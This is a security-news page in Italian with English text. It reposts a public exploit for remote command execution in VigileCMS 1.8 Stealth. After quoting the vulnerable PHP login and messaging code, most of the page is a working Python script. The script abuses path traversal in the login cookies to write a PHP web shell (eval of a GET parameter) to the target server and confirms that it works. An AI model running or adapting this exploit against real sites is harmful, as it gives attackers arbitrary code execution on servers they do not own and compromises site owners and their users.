Opencosmo Security
http://www.opencosmo.com
http://www.opencosmo.com/news.php?readmore=15
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
Crediti: The:Paradox
Applicazione: VigileCMS
Versione: 1.8
Impatto: Remote Command Execution
Rischio: [3/5]
Exploit: #!/usr/bin/python
#-- coding: iso-8859-15 --
'''
| || | ___ _ _ __ __ _ _ _ __ _ | |___ __
| | ' \/ -)||| ' \/ ` | '/ ` / ` / _ \ \ /
\__|||\|||| ./\,|| \,\__,\_/\\
_ |
---|
This is a Public Exploit. 22/10/2007 (dd-mm-yyyy) |
В§ 0day VigileCMS 1.8 Stealth and maybe lower version - Remote Command Execution В§
Vendor: http://www.vigilenapoletano.it
Severity: Highest
Author: The:Paradox
Italy r0x.
Visit inj3ct-it.org
Related Codes:
— index.php; line 64:
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {
if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){
$_SESSION[user] = $_COOKIE[rem_user];
$_SESSION[pass] = $_COOKIE[rem_pass];
logthis("$_SESSION[user] si ГЁ collegato al Sito: riconosciuto con Cookie!");
UserVisita ();// aggiornamento database utente per numero di visite
}
}
— func.inc.php; line 93:
function is_admin(){ //## FUNCTION ##
if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){
return true;
} else {
return false;
}
}
— func.inc.php; line 109:
function is_superadmin(){ //## FUNCTION ##
include (LOGS_TAB."/creazione.php");
if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {
return true;
} else {
return false;
}
}
— vedipm.php; line 210:
if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";
$_POST[ttl] =stripslashes($_POST[ttl]);
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni caratteri html e maligni tipo javascript
$_POST[cont]=stripslashes($_POST[cont]);
$_POST[cont]=htmlspecialchars($_POST[cont]); // impedisce visualizzazioni caratteri html e maligni tipo javascript
$_POST[cont]=str_replace("\r\n","[br]",$_POST[cont]);
$_POST[cont]=str_replace("<~>","<|>",$_POST[cont]);
$_POST[ttl]=str_replace("<~>","<|>",$_POST[ttl]);
$time = time();
Bug Explanation:
The platform presents some vulnerabilities in the "login system" and in the "private message sender system".
The first vulnerability is in index.php that verifies the login without sql database verifying the existence of files with the structure Nick.HashMD5Password.php in a dir "db".
The cms'coder didn't thought about directory transversal. In fact if we try to login with these cookies:
rem_user = /…/users/Nick
rem_pass = HashMD5Password
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
import sys, httplib, urllib
print ""
if len(sys.argv)<=1:
print "################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
sys.exit()
else:
print "################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
print "[.]Exploit Starting. "
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
try:
#Verifing /db/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%sdb/index.php" % (directory))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
sys.exit("[-]/db/index.php not found (404). Aborted.")
conn.close()
#Verifing /pm/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%sdb/pm/index.php" % (directory))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
sys.exit("[-]/db/pm/index.php not found (404). Aborted.")
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")
if old == 1:
pt = "/"
pt2 = "?"
else:
pt = "?"
pt2 = "&"
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '…/.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F…%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 –>",response.status, response.reason
conn.close()
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '…/igotyourbox.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F…%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 –>",response.status, response.reason
conn.close()
try:
conn = httplib.HTTPConnection(target,port)
path = "%s%s/igotyourbox.php" % (directory,db)
conn.request("GET", path)
r1 = conn.getresponse()
conn.close()
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success…"
if r1.status == 404:
sys.exit("[-]Exploit Failed.")
else:
print "[+]Done.\n[+]Removing the page…"
conn = httplib.HTTPConnection(target,port)
path = directory + "db/igotyourbox.php?dox=unlink('%3C?php%20eval(stripslashes($_GET[dox]));%20?%3E.paradox-got-this-one.php');"
conn.request("GET", path)
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s%s/igotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,directory,db)
Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.